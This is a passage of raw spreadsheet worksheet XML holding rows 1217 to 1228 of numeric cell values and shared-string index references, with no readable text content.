        <v>10853</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t="s">
        <v>9067</v>
      </c>
      <c r="AG1217">
        <v>36613</v>
      </c>
      <c r="AH1217">
        <v>7</v>
      </c>
      <c r="AJ1217">
        <v>91</v>
      </c>
      <c r="AK1217" t="s">
        <v>8667</v>
      </c>
      <c r="AL1217" t="s">
        <v>9068</v>
      </c>
      <c r="AM1217" t="s">
        <v>9069</v>
      </c>
      <c r="AN1217" t="s">
        <v>68</v>
      </c>
      <c r="AO1217">
        <v>2014</v>
      </c>
      <c r="AP1217">
        <v>82175902467</v>
      </c>
      <c r="AQ1217">
        <v>82175902467</v>
      </c>
      <c r="AR1217" t="s">
        <v>9067</v>
      </c>
      <c r="AS1217" t="s">
        <v>371</v>
      </c>
      <c r="AT1217" t="s">
        <v>72</v>
      </c>
      <c r="AU1217">
        <v>0</v>
      </c>
      <c r="AV1217">
        <v>0</v>
      </c>
      <c r="AW1217">
        <v>1</v>
      </c>
      <c r="AX1217">
        <v>1</v>
      </c>
      <c r="AY1217">
        <v>1</v>
      </c>
      <c r="AZ1217">
        <v>3</v>
      </c>
      <c r="BA1217" t="s">
        <v>17708</v>
      </c>
      <c r="BB1217">
        <v>0</v>
      </c>
      <c r="BC1217" t="s">
        <v>9791</v>
      </c>
      <c r="BD1217">
        <v>0</v>
      </c>
    </row>
    <row r="1218" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1218">
        <v>5613</v>
      </c>
      <c r="B1218" t="s">
        <v>9070</v>
      </c>
      <c r="C1218" t="s">
        <v>3013</v>
      </c>
      <c r="D1218" t="s">
        <v>9071</v>
      </c>
      <c r="E1218" t="s">
        <v>363</v>
      </c>
      <c r="F1218" t="s">
        <v>7057</v>
      </c>
      <c r="G1218" s="1">
        <v>44313</v>
      </c>
      <c r="H1218">
        <v>10858</v>
      </c>
      <c r="I1218">
        <v>10858</v>
      </c>
      <c r="J1218">
        <v>3</v>
      </c>
      <c r="K1218">
        <v>1</v>
      </c>
      <c r="L1218">
        <v>2</v>
      </c>
      <c r="M1218">
        <v>0</v>
      </c>
      <c r="N1218">
        <v>0</v>
      </c>
      <c r="O1218">
        <v>0</v>
      </c>
      <c r="P1218">
        <v>0</v>
      </c>
      <c r="Q1218">
        <v>0</v>
      </c>
      <c r="R1218">
        <v>0</v>
      </c>
      <c r="S1218">
        <v>0</v>
      </c>
      <c r="T1218">
        <v>1</v>
      </c>
      <c r="U1218">
        <v>3000</v>
      </c>
      <c r="V1218">
        <v>10000</v>
      </c>
      <c r="W1218">
        <v>10000</v>
      </c>
      <c r="X1218">
        <v>0</v>
      </c>
      <c r="Y1218">
        <v>0</v>
      </c>
      <c r="Z1218">
        <v>0</v>
      </c>
      <c r="AA1218">
        <v>0</v>
      </c>
      <c r="AB1218">
        <v>0</v>
      </c>
      <c r="AC1218">
        <v>0</v>
      </c>
      <c r="AD1218">
        <v>0</v>
      </c>
      <c r="AE1218">
        <v>5000</v>
      </c>
      <c r="AF1218" t="s">
        <v>9072</v>
      </c>
      <c r="AG1218">
        <v>28753</v>
      </c>
      <c r="AH1218">
        <v>4</v>
      </c>
      <c r="AJ1218">
        <v>85</v>
      </c>
      <c r="AK1218" t="s">
        <v>9073</v>
      </c>
      <c r="AL1218" t="s">
        <v>9074</v>
      </c>
      <c r="AM1218" t="s">
        <v>9075</v>
      </c>
      <c r="AN1218" t="s">
        <v>68</v>
      </c>
      <c r="AO1218">
        <v>2020</v>
      </c>
      <c r="AP1218" t="s">
        <v>9076</v>
      </c>
      <c r="AQ1218" t="s">
        <v>9077</v>
      </c>
      <c r="AR1218" t="s">
        <v>9072</v>
      </c>
      <c r="AS1218" t="s">
        <v>71</v>
      </c>
      <c r="AT1218" t="s">
        <v>72</v>
      </c>
      <c r="AU1218">
        <v>26</v>
      </c>
      <c r="AV1218">
        <v>0</v>
      </c>
      <c r="AW1218">
        <v>2</v>
      </c>
      <c r="AX1218">
        <v>6</v>
      </c>
      <c r="AY1218">
        <v>3</v>
      </c>
      <c r="AZ1218">
        <v>3</v>
      </c>
      <c r="BA1218" t="s">
        <v>17706</v>
      </c>
      <c r="BB1218" t="s">
        <v>16169</v>
      </c>
      <c r="BC1218">
        <v>0</v>
      </c>
      <c r="BD1218" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="1219" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1219">
        <v>5645</v>
      </c>
      <c r="B1219" t="s">
        <v>2951</v>
      </c>
      <c r="C1219" t="s">
        <v>1672</v>
      </c>
      <c r="D1219" t="s">
        <v>9078</v>
      </c>
      <c r="E1219" t="s">
        <v>843</v>
      </c>
      <c r="F1219" t="s">
        <v>1368</v>
      </c>
      <c r="G1219" s="1">
        <v>44337</v>
      </c>
      <c r="H1219">
        <v>10890</v>
      </c>
      <c r="I1219">
        <v>10890</v>
      </c>
      <c r="J1219">
        <v>0</v>
      </c>
      <c r="K1219">
        <v>0</v>
      </c>
      <c r="L1219">
        <v>0</v>
      </c>
      <c r="M1219">
        <v>0</v>
      </c>
      <c r="N1219">
        <v>0</v>
      </c>
      <c r="O1219">
        <v>0</v>
      </c>
      <c r="P1219">
        <v>0</v>
      </c>
      <c r="Q1219">
        <v>1</v>
      </c>
      <c r="R1219">
        <v>10</v>
      </c>
      <c r="S1219">
        <v>0</v>
      </c>
      <c r="T1219">
        <v>0</v>
      </c>
      <c r="U1219">
        <v>0</v>
      </c>
      <c r="V1219">
        <v>0</v>
      </c>
      <c r="W1219">
        <v>0</v>
      </c>
      <c r="X1219">
        <v>0</v>
      </c>
      <c r="Y1219">
        <v>0</v>
      </c>
      <c r="Z1219">
        <v>0</v>
      </c>
      <c r="AA1219">
        <v>0</v>
      </c>
      <c r="AB1219">
        <v>0</v>
      </c>
      <c r="AC1219">
        <v>30</v>
      </c>
      <c r="AD1219">
        <v>0</v>
      </c>
      <c r="AE1219">
        <v>0</v>
      </c>
      <c r="AF1219" t="s">
        <v>9079</v>
      </c>
      <c r="AG1219">
        <v>70721</v>
      </c>
      <c r="AH1219">
        <v>22</v>
      </c>
      <c r="AJ1219">
        <v>355</v>
      </c>
      <c r="AK1219" t="s">
        <v>9080</v>
      </c>
      <c r="AL1219" t="s">
        <v>9081</v>
      </c>
      <c r="AM1219" t="s">
        <v>9082</v>
      </c>
      <c r="AN1219" t="s">
        <v>68</v>
      </c>
      <c r="AO1219">
        <v>2021</v>
      </c>
      <c r="AP1219">
        <v>87842840111</v>
      </c>
      <c r="AQ1219" t="s">
        <v>9083</v>
      </c>
      <c r="AR1219" t="s">
        <v>9079</v>
      </c>
      <c r="AS1219" t="s">
        <v>71</v>
      </c>
      <c r="AT1219" t="s">
        <v>58</v>
      </c>
      <c r="AU1219">
        <v>30</v>
      </c>
      <c r="AV1219">
        <v>0</v>
      </c>
      <c r="AW1219">
        <v>0</v>
      </c>
      <c r="AX1219">
        <v>0</v>
      </c>
      <c r="AY1219">
        <v>4</v>
      </c>
      <c r="AZ1219">
        <v>1</v>
      </c>
      <c r="BA1219" t="s">
        <v>16828</v>
      </c>
      <c r="BB1219">
        <v>0</v>
      </c>
      <c r="BC1219" t="s">
        <v>9550</v>
      </c>
      <c r="BD1219" t="s">
        <v>13864</v>
      </c>
    </row>
    <row r="1220" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1220">
        <v>5643</v>
      </c>
      <c r="B1220" t="s">
        <v>9084</v>
      </c>
      <c r="C1220" t="s">
        <v>168</v>
      </c>
      <c r="D1220" t="s">
        <v>9085</v>
      </c>
      <c r="E1220" t="s">
        <v>142</v>
      </c>
      <c r="F1220" t="s">
        <v>537</v>
      </c>
      <c r="G1220" s="1">
        <v>44354</v>
      </c>
      <c r="H1220">
        <v>10896</v>
      </c>
      <c r="I1220">
        <v>10896</v>
      </c>
      <c r="J1220">
        <v>4</v>
      </c>
      <c r="K1220">
        <v>0</v>
      </c>
      <c r="L1220">
        <v>2</v>
      </c>
      <c r="M1220">
        <v>2</v>
      </c>
      <c r="N1220">
        <v>0</v>
      </c>
      <c r="O1220">
        <v>0</v>
      </c>
      <c r="P1220">
        <v>0</v>
      </c>
      <c r="Q1220">
        <v>0</v>
      </c>
      <c r="R1220">
        <v>0</v>
      </c>
      <c r="S1220">
        <v>0</v>
      </c>
      <c r="T1220">
        <v>0</v>
      </c>
      <c r="U1220">
        <v>150000</v>
      </c>
      <c r="V1220">
        <v>0</v>
      </c>
      <c r="W1220">
        <v>0</v>
      </c>
      <c r="X1220">
        <v>3360</v>
      </c>
      <c r="Y1220">
        <v>0</v>
      </c>
      <c r="Z1220">
        <v>0</v>
      </c>
      <c r="AA1220">
        <v>0</v>
      </c>
      <c r="AB1220">
        <v>0</v>
      </c>
      <c r="AC1220">
        <v>0</v>
      </c>
      <c r="AD1220">
        <v>0</v>
      </c>
      <c r="AE1220">
        <v>0</v>
      </c>
      <c r="AF1220" t="s">
        <v>1722</v>
      </c>
      <c r="AG1220">
        <v>45173</v>
      </c>
      <c r="AH1220">
        <v>13</v>
      </c>
      <c r="AJ1220">
        <v>169</v>
      </c>
      <c r="AK1220" t="s">
        <v>1723</v>
      </c>
      <c r="AL1220" t="s">
        <v>1724</v>
      </c>
      <c r="AM1220" t="s">
        <v>9086</v>
      </c>
      <c r="AN1220" t="s">
        <v>82</v>
      </c>
      <c r="AO1220">
        <v>2012</v>
      </c>
      <c r="AP1220" t="s">
        <v>1726</v>
      </c>
      <c r="AQ1220" t="s">
        <v>9087</v>
      </c>
      <c r="AR1220" t="s">
        <v>1722</v>
      </c>
      <c r="AS1220" t="s">
        <v>71</v>
      </c>
      <c r="AT1220" t="s">
        <v>86</v>
      </c>
      <c r="AU1220">
        <v>26</v>
      </c>
      <c r="AV1220">
        <v>2</v>
      </c>
      <c r="AW1220">
        <v>86</v>
      </c>
      <c r="AX1220">
        <v>578</v>
      </c>
      <c r="AY1220">
        <v>25</v>
      </c>
      <c r="AZ1220">
        <v>16</v>
      </c>
      <c r="BA1220" t="s">
        <v>16866</v>
      </c>
      <c r="BB1220" t="s">
        <v>14723</v>
      </c>
      <c r="BC1220" t="s">
        <v>10442</v>
      </c>
      <c r="BD1220" t="s">
        <v>13868</v>
      </c>
    </row>
    <row r="1221" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1221">
        <v>5627</v>
      </c>
      <c r="B1221" t="s">
        <v>9088</v>
      </c>
      <c r="C1221" t="s">
        <v>168</v>
      </c>
      <c r="D1221" t="s">
        <v>9089</v>
      </c>
      <c r="E1221" t="s">
        <v>142</v>
      </c>
      <c r="F1221" t="s">
        <v>151</v>
      </c>
      <c r="G1221" s="1">
        <v>44358</v>
      </c>
      <c r="H1221">
        <v>10913</v>
      </c>
      <c r="I1221">
        <v>10913</v>
      </c>
      <c r="J1221">
        <v>1</v>
      </c>
      <c r="K1221">
        <v>0</v>
      </c>
      <c r="L1221">
        <v>0</v>
      </c>
      <c r="M1221">
        <v>1</v>
      </c>
      <c r="N1221">
        <v>0</v>
      </c>
      <c r="O1221">
        <v>0</v>
      </c>
      <c r="P1221">
        <v>0</v>
      </c>
      <c r="Q1221">
        <v>5</v>
      </c>
      <c r="R1221">
        <v>20</v>
      </c>
      <c r="S1221">
        <v>0</v>
      </c>
      <c r="T1221">
        <v>0</v>
      </c>
      <c r="U1221">
        <v>500</v>
      </c>
      <c r="V1221">
        <v>0</v>
      </c>
      <c r="W1221">
        <v>0</v>
      </c>
      <c r="X1221">
        <v>500</v>
      </c>
      <c r="Y1221">
        <v>0</v>
      </c>
      <c r="Z1221">
        <v>0</v>
      </c>
      <c r="AA1221">
        <v>0</v>
      </c>
      <c r="AB1221">
        <v>500</v>
      </c>
      <c r="AC1221">
        <v>1000</v>
      </c>
      <c r="AD1221">
        <v>0</v>
      </c>
      <c r="AE1221">
        <v>0</v>
      </c>
      <c r="AF1221" t="s">
        <v>9090</v>
      </c>
      <c r="AG1221">
        <v>45611</v>
      </c>
      <c r="AH1221">
        <v>13</v>
      </c>
      <c r="AJ1221">
        <v>169</v>
      </c>
      <c r="AK1221" t="s">
        <v>5061</v>
      </c>
      <c r="AL1221" t="s">
        <v>9091</v>
      </c>
      <c r="AM1221" t="s">
        <v>9092</v>
      </c>
      <c r="AN1221" t="s">
        <v>55</v>
      </c>
      <c r="AO1221">
        <v>1999</v>
      </c>
      <c r="AP1221" t="s">
        <v>623</v>
      </c>
      <c r="AQ1221" t="s">
        <v>9093</v>
      </c>
      <c r="AR1221" t="s">
        <v>9094</v>
      </c>
      <c r="AS1221" t="s">
        <v>71</v>
      </c>
      <c r="AT1221" t="s">
        <v>58</v>
      </c>
      <c r="AU1221">
        <v>0</v>
      </c>
      <c r="AV1221">
        <v>0</v>
      </c>
      <c r="AW1221">
        <v>10</v>
      </c>
      <c r="AX1221">
        <v>70</v>
      </c>
      <c r="AY1221">
        <v>5</v>
      </c>
      <c r="AZ1221">
        <v>5</v>
      </c>
      <c r="BA1221" t="s">
        <v>16644</v>
      </c>
      <c r="BB1221">
        <v>0</v>
      </c>
      <c r="BC1221">
        <v>0</v>
      </c>
      <c r="BD1221">
        <v>0</v>
      </c>
    </row>
    <row r="1222" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1222">
        <v>5623</v>
      </c>
      <c r="B1222" t="s">
        <v>9095</v>
      </c>
      <c r="C1222" t="s">
        <v>215</v>
      </c>
      <c r="D1222" t="s">
        <v>9096</v>
      </c>
      <c r="E1222" t="s">
        <v>363</v>
      </c>
      <c r="F1222" t="s">
        <v>9097</v>
      </c>
      <c r="G1222" s="1">
        <v>44370</v>
      </c>
      <c r="H1222">
        <v>10915</v>
      </c>
      <c r="I1222">
        <v>10915</v>
      </c>
      <c r="J1222">
        <v>0</v>
      </c>
      <c r="K1222">
        <v>0</v>
      </c>
      <c r="L1222">
        <v>0</v>
      </c>
      <c r="M1222">
        <v>0</v>
      </c>
      <c r="N1222">
        <v>0</v>
      </c>
      <c r="O1222">
        <v>0</v>
      </c>
      <c r="P1222">
        <v>0</v>
      </c>
      <c r="Q1222">
        <v>1</v>
      </c>
      <c r="R1222">
        <v>0</v>
      </c>
      <c r="S1222">
        <v>0</v>
      </c>
      <c r="T1222">
        <v>1</v>
      </c>
      <c r="U1222">
        <v>0</v>
      </c>
      <c r="V1222">
        <v>0</v>
      </c>
      <c r="W1222">
        <v>0</v>
      </c>
      <c r="X1222">
        <v>0</v>
      </c>
      <c r="Y1222">
        <v>0</v>
      </c>
      <c r="Z1222">
        <v>0</v>
      </c>
      <c r="AA1222">
        <v>0</v>
      </c>
      <c r="AB1222">
        <v>5</v>
      </c>
      <c r="AC1222">
        <v>0</v>
      </c>
      <c r="AD1222">
        <v>0</v>
      </c>
      <c r="AE1222">
        <v>100</v>
      </c>
      <c r="AF1222" t="s">
        <v>9098</v>
      </c>
      <c r="AG1222">
        <v>33212</v>
      </c>
      <c r="AH1222">
        <v>6</v>
      </c>
      <c r="AJ1222">
        <v>141</v>
      </c>
      <c r="AK1222" t="s">
        <v>8964</v>
      </c>
      <c r="AL1222" t="s">
        <v>9099</v>
      </c>
      <c r="AM1222" t="s">
        <v>9100</v>
      </c>
      <c r="AN1222" t="s">
        <v>68</v>
      </c>
      <c r="AO1222">
        <v>2011</v>
      </c>
      <c r="AP1222" t="s">
        <v>9101</v>
      </c>
      <c r="AQ1222" t="s">
        <v>9102</v>
      </c>
      <c r="AR1222" t="s">
        <v>9098</v>
      </c>
      <c r="AS1222" t="s">
        <v>71</v>
      </c>
      <c r="AT1222" t="s">
        <v>72</v>
      </c>
      <c r="AU1222">
        <v>25</v>
      </c>
      <c r="AV1222">
        <v>1</v>
      </c>
      <c r="AW1222">
        <v>0</v>
      </c>
      <c r="AX1222">
        <v>0</v>
      </c>
      <c r="AY1222">
        <v>1</v>
      </c>
      <c r="AZ1222">
        <v>4</v>
      </c>
      <c r="BA1222" t="s">
        <v>17711</v>
      </c>
      <c r="BB1222" t="s">
        <v>17717</v>
      </c>
      <c r="BC1222" t="s">
        <v>14060</v>
      </c>
      <c r="BD1222">
        <v>0</v>
      </c>
    </row>
    <row r="1223" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1223">
        <v>5628</v>
      </c>
      <c r="B1223" t="s">
        <v>9103</v>
      </c>
      <c r="C1223" t="s">
        <v>215</v>
      </c>
      <c r="D1223" t="s">
        <v>9104</v>
      </c>
      <c r="E1223" t="s">
        <v>363</v>
      </c>
      <c r="F1223" t="s">
        <v>9105</v>
      </c>
      <c r="G1223" s="1">
        <v>44321</v>
      </c>
      <c r="H1223">
        <v>10917</v>
      </c>
      <c r="I1223">
        <v>10917</v>
      </c>
      <c r="J1223">
        <v>0</v>
      </c>
      <c r="K1223">
        <v>0</v>
      </c>
      <c r="L1223">
        <v>0</v>
      </c>
      <c r="M1223">
        <v>0</v>
      </c>
      <c r="N1223">
        <v>0</v>
      </c>
      <c r="O1223">
        <v>6</v>
      </c>
      <c r="P1223">
        <v>0</v>
      </c>
      <c r="Q1223">
        <v>4</v>
      </c>
      <c r="R1223">
        <v>0</v>
      </c>
      <c r="S1223">
        <v>0</v>
      </c>
      <c r="T1223">
        <v>1</v>
      </c>
      <c r="U1223">
        <v>0</v>
      </c>
      <c r="V1223">
        <v>0</v>
      </c>
      <c r="W1223">
        <v>0</v>
      </c>
      <c r="X1223">
        <v>0</v>
      </c>
      <c r="Y1223">
        <v>0</v>
      </c>
      <c r="Z1223">
        <v>1980</v>
      </c>
      <c r="AA1223">
        <v>0</v>
      </c>
      <c r="AB1223">
        <v>1440</v>
      </c>
      <c r="AC1223">
        <v>0</v>
      </c>
      <c r="AD1223">
        <v>0</v>
      </c>
      <c r="AE1223">
        <v>2000</v>
      </c>
      <c r="AF1223" t="s">
        <v>9106</v>
      </c>
      <c r="AG1223">
        <v>33147</v>
      </c>
      <c r="AH1223">
        <v>6</v>
      </c>
      <c r="AJ1223">
        <v>147</v>
      </c>
      <c r="AK1223" t="s">
        <v>339</v>
      </c>
      <c r="AL1223" t="s">
        <v>9107</v>
      </c>
      <c r="AM1223" t="s">
        <v>9108</v>
      </c>
      <c r="AN1223" t="s">
        <v>68</v>
      </c>
      <c r="AO1223">
        <v>2016</v>
      </c>
      <c r="AP1223">
        <v>81367509543</v>
      </c>
      <c r="AQ1223" t="s">
        <v>9109</v>
      </c>
      <c r="AR1223" t="s">
        <v>9110</v>
      </c>
      <c r="AS1223" t="s">
        <v>71</v>
      </c>
      <c r="AT1223" t="s">
        <v>72</v>
      </c>
      <c r="AU1223">
        <v>25</v>
      </c>
      <c r="AV1223">
        <v>1</v>
      </c>
      <c r="AW1223">
        <v>2</v>
      </c>
      <c r="AX1223">
        <v>4</v>
      </c>
      <c r="AY1223">
        <v>4</v>
      </c>
      <c r="AZ1223">
        <v>6</v>
      </c>
      <c r="BA1223" t="s">
        <v>17713</v>
      </c>
      <c r="BB1223" t="s">
        <v>17718</v>
      </c>
      <c r="BC1223" t="s">
        <v>9852</v>
      </c>
      <c r="BD1223" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="1224" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1224">
        <v>5651</v>
      </c>
      <c r="B1224" t="s">
        <v>9111</v>
      </c>
      <c r="C1224" t="s">
        <v>47</v>
      </c>
      <c r="D1224" t="s">
        <v>9112</v>
      </c>
      <c r="E1224" t="s">
        <v>49</v>
      </c>
      <c r="F1224" t="s">
        <v>9113</v>
      </c>
      <c r="G1224" s="1">
        <v>44340</v>
      </c>
      <c r="H1224">
        <v>10942</v>
      </c>
      <c r="I1224">
        <v>10942</v>
      </c>
      <c r="J1224">
        <v>0</v>
      </c>
      <c r="K1224">
        <v>0</v>
      </c>
      <c r="L1224">
        <v>0</v>
      </c>
      <c r="M1224">
        <v>0</v>
      </c>
      <c r="N1224">
        <v>0</v>
      </c>
      <c r="O1224">
        <v>0</v>
      </c>
      <c r="P1224">
        <v>0</v>
      </c>
      <c r="Q1224">
        <v>1</v>
      </c>
      <c r="R1224">
        <v>1</v>
      </c>
      <c r="S1224">
        <v>0</v>
      </c>
      <c r="T1224">
        <v>1</v>
      </c>
      <c r="U1224">
        <v>0</v>
      </c>
      <c r="V1224">
        <v>0</v>
      </c>
      <c r="W1224">
        <v>0</v>
      </c>
      <c r="X1224">
        <v>0</v>
      </c>
      <c r="Y1224">
        <v>0</v>
      </c>
      <c r="Z1224">
        <v>0</v>
      </c>
      <c r="AA1224">
        <v>0</v>
      </c>
      <c r="AB1224">
        <v>100</v>
      </c>
      <c r="AC1224">
        <v>200</v>
      </c>
      <c r="AD1224">
        <v>0</v>
      </c>
      <c r="AE1224">
        <v>1000</v>
      </c>
      <c r="AF1224" t="s">
        <v>9114</v>
      </c>
      <c r="AG1224">
        <v>20372</v>
      </c>
      <c r="AH1224">
        <v>2</v>
      </c>
      <c r="AJ1224">
        <v>35</v>
      </c>
      <c r="AK1224" t="s">
        <v>9115</v>
      </c>
      <c r="AL1224" t="s">
        <v>9116</v>
      </c>
      <c r="AM1224" t="s">
        <v>9117</v>
      </c>
      <c r="AN1224" t="s">
        <v>68</v>
      </c>
      <c r="AO1224">
        <v>2016</v>
      </c>
      <c r="AP1224">
        <v>8116075026</v>
      </c>
      <c r="AQ1224" t="s">
        <v>9118</v>
      </c>
      <c r="AR1224" t="s">
        <v>9114</v>
      </c>
      <c r="AS1224" t="s">
        <v>71</v>
      </c>
      <c r="AT1224" t="s">
        <v>72</v>
      </c>
      <c r="AU1224">
        <v>6</v>
      </c>
      <c r="AV1224">
        <v>1</v>
      </c>
      <c r="AW1224">
        <v>4</v>
      </c>
      <c r="AX1224">
        <v>10</v>
      </c>
      <c r="AY1224">
        <v>1</v>
      </c>
      <c r="AZ1224">
        <v>2</v>
      </c>
      <c r="BA1224" t="s">
        <v>17724</v>
      </c>
      <c r="BB1224">
        <v>0</v>
      </c>
      <c r="BC1224" t="s">
        <v>13910</v>
      </c>
      <c r="BD1224">
        <v>0</v>
      </c>
    </row>
    <row r="1225" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1225">
        <v>5615</v>
      </c>
      <c r="B1225" t="s">
        <v>9119</v>
      </c>
      <c r="C1225" t="s">
        <v>318</v>
      </c>
      <c r="D1225" t="s">
        <v>9120</v>
      </c>
      <c r="E1225" t="s">
        <v>363</v>
      </c>
      <c r="F1225" t="s">
        <v>3499</v>
      </c>
      <c r="G1225" s="1">
        <v>44375</v>
      </c>
      <c r="H1225">
        <v>10975</v>
      </c>
      <c r="I1225">
        <v>10975</v>
      </c>
      <c r="J1225">
        <v>0</v>
      </c>
      <c r="K1225">
        <v>0</v>
      </c>
      <c r="L1225">
        <v>0</v>
      </c>
      <c r="M1225">
        <v>0</v>
      </c>
      <c r="N1225">
        <v>0</v>
      </c>
      <c r="O1225">
        <v>0</v>
      </c>
      <c r="P1225">
        <v>0</v>
      </c>
      <c r="Q1225">
        <v>0</v>
      </c>
      <c r="R1225">
        <v>0</v>
      </c>
      <c r="S1225">
        <v>0</v>
      </c>
      <c r="T1225">
        <v>1</v>
      </c>
      <c r="U1225">
        <v>0</v>
      </c>
      <c r="V1225">
        <v>0</v>
      </c>
      <c r="W1225">
        <v>0</v>
      </c>
      <c r="X1225">
        <v>0</v>
      </c>
      <c r="Y1225">
        <v>0</v>
      </c>
      <c r="Z1225">
        <v>0</v>
      </c>
      <c r="AA1225">
        <v>0</v>
      </c>
      <c r="AB1225">
        <v>0</v>
      </c>
      <c r="AC1225">
        <v>0</v>
      </c>
      <c r="AD1225">
        <v>0</v>
      </c>
      <c r="AE1225">
        <v>20</v>
      </c>
      <c r="AF1225" t="s">
        <v>9121</v>
      </c>
      <c r="AG1225">
        <v>90225</v>
      </c>
      <c r="AH1225">
        <v>26</v>
      </c>
      <c r="AJ1225">
        <v>420</v>
      </c>
      <c r="AK1225" t="s">
        <v>5889</v>
      </c>
      <c r="AL1225" t="s">
        <v>9122</v>
      </c>
      <c r="AM1225" t="s">
        <v>9123</v>
      </c>
      <c r="AN1225" t="s">
        <v>55</v>
      </c>
      <c r="AO1225">
        <v>2021</v>
      </c>
      <c r="AP1225">
        <v>85922201777</v>
      </c>
      <c r="AQ1225" t="s">
        <v>9124</v>
      </c>
      <c r="AR1225" t="s">
        <v>9125</v>
      </c>
      <c r="AS1225" t="s">
        <v>71</v>
      </c>
      <c r="AT1225" t="s">
        <v>58</v>
      </c>
      <c r="AU1225">
        <v>26</v>
      </c>
      <c r="AV1225">
        <v>0</v>
      </c>
      <c r="AW1225">
        <v>3</v>
      </c>
      <c r="AX1225">
        <v>7</v>
      </c>
      <c r="AY1225">
        <v>6</v>
      </c>
      <c r="AZ1225">
        <v>3</v>
      </c>
      <c r="BA1225" t="s">
        <v>17707</v>
      </c>
      <c r="BB1225" t="s">
        <v>17725</v>
      </c>
      <c r="BC1225">
        <v>0</v>
      </c>
      <c r="BD1225" t="s">
        <v>10618</v>
      </c>
    </row>
    <row r="1226" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1226">
        <v>5649</v>
      </c>
      <c r="B1226" t="s">
        <v>2677</v>
      </c>
      <c r="C1226" t="s">
        <v>318</v>
      </c>
      <c r="D1226" t="s">
        <v>9126</v>
      </c>
      <c r="E1226" t="s">
        <v>843</v>
      </c>
      <c r="F1226" t="s">
        <v>6917</v>
      </c>
      <c r="G1226" s="1">
        <v>44336</v>
      </c>
      <c r="H1226">
        <v>10983</v>
      </c>
      <c r="I1226">
        <v>10983</v>
      </c>
      <c r="J1226">
        <v>0</v>
      </c>
      <c r="K1226">
        <v>0</v>
      </c>
      <c r="L1226">
        <v>0</v>
      </c>
      <c r="M1226">
        <v>0</v>
      </c>
      <c r="N1226">
        <v>0</v>
      </c>
      <c r="O1226">
        <v>0</v>
      </c>
      <c r="P1226">
        <v>0</v>
      </c>
      <c r="Q1226">
        <v>1</v>
      </c>
      <c r="R1226">
        <v>2</v>
      </c>
      <c r="S1226">
        <v>0</v>
      </c>
      <c r="T1226">
        <v>1</v>
      </c>
      <c r="U1226">
        <v>0</v>
      </c>
      <c r="V1226">
        <v>0</v>
      </c>
      <c r="W1226">
        <v>0</v>
      </c>
      <c r="X1226">
        <v>0</v>
      </c>
      <c r="Y1226">
        <v>0</v>
      </c>
      <c r="Z1226">
        <v>0</v>
      </c>
      <c r="AA1226">
        <v>0</v>
      </c>
      <c r="AB1226">
        <v>50</v>
      </c>
      <c r="AC1226">
        <v>200</v>
      </c>
      <c r="AD1226">
        <v>0</v>
      </c>
      <c r="AE1226">
        <v>1000</v>
      </c>
      <c r="AF1226" t="s">
        <v>9127</v>
      </c>
      <c r="AG1226">
        <v>90242</v>
      </c>
      <c r="AH1226">
        <v>26</v>
      </c>
      <c r="AJ1226">
        <v>420</v>
      </c>
      <c r="AK1226" t="s">
        <v>331</v>
      </c>
      <c r="AL1226" t="s">
        <v>9128</v>
      </c>
      <c r="AM1226" t="s">
        <v>9129</v>
      </c>
      <c r="AN1226" t="s">
        <v>68</v>
      </c>
      <c r="AO1226">
        <v>2018</v>
      </c>
      <c r="AP1226">
        <v>8129818080</v>
      </c>
      <c r="AQ1226" t="s">
        <v>9130</v>
      </c>
      <c r="AR1226" t="s">
        <v>9131</v>
      </c>
      <c r="AS1226" t="s">
        <v>71</v>
      </c>
      <c r="AT1226" t="s">
        <v>72</v>
      </c>
      <c r="AU1226">
        <v>6</v>
      </c>
      <c r="AV1226">
        <v>0</v>
      </c>
      <c r="AW1226">
        <v>6</v>
      </c>
      <c r="AX1226">
        <v>2</v>
      </c>
      <c r="AY1226">
        <v>2</v>
      </c>
      <c r="AZ1226">
        <v>1</v>
      </c>
      <c r="BA1226" t="s">
        <v>16899</v>
      </c>
      <c r="BB1226">
        <v>0</v>
      </c>
      <c r="BC1226">
        <v>0</v>
      </c>
      <c r="BD1226" t="s">
        <v>9810</v>
      </c>
    </row>
    <row r="1227" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1227">
        <v>5644</v>
      </c>
      <c r="B1227" t="s">
        <v>9132</v>
      </c>
      <c r="C1227" t="s">
        <v>477</v>
      </c>
      <c r="D1227" t="s">
        <v>9133</v>
      </c>
      <c r="E1227" t="s">
        <v>4733</v>
      </c>
      <c r="F1227" t="s">
        <v>9134</v>
      </c>
      <c r="G1227" s="1">
        <v>44350</v>
      </c>
      <c r="H1227">
        <v>10997</v>
      </c>
      <c r="I1227">
        <v>10997</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t="s">
        <v>9135</v>
      </c>
      <c r="AG1227">
        <v>95246</v>
      </c>
      <c r="AH1227">
        <v>29</v>
      </c>
      <c r="AJ1227">
        <v>382</v>
      </c>
      <c r="AK1227" t="s">
        <v>482</v>
      </c>
      <c r="AL1227" t="s">
        <v>9136</v>
      </c>
      <c r="AM1227" t="s">
        <v>9137</v>
      </c>
      <c r="AN1227" t="s">
        <v>68</v>
      </c>
      <c r="AO1227">
        <v>2015</v>
      </c>
      <c r="AP1227">
        <v>85256607250</v>
      </c>
      <c r="AQ1227" t="s">
        <v>9138</v>
      </c>
      <c r="AR1227" t="s">
        <v>9135</v>
      </c>
      <c r="AS1227" t="s">
        <v>71</v>
      </c>
      <c r="AT1227" t="s">
        <v>72</v>
      </c>
      <c r="AU1227">
        <v>8</v>
      </c>
      <c r="AV1227">
        <v>0</v>
      </c>
      <c r="AW1227">
        <v>0</v>
      </c>
      <c r="AX1227">
        <v>0</v>
      </c>
      <c r="AY1227">
        <v>2</v>
      </c>
      <c r="AZ1227">
        <v>1</v>
      </c>
      <c r="BA1227" t="s">
        <v>17722</v>
      </c>
      <c r="BB1227">
        <v>0</v>
      </c>
      <c r="BC1227" t="s">
        <v>13708</v>
      </c>
      <c r="BD1227">
        <v>0</v>
      </c>
    </row>
    <row r="1228" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1228">
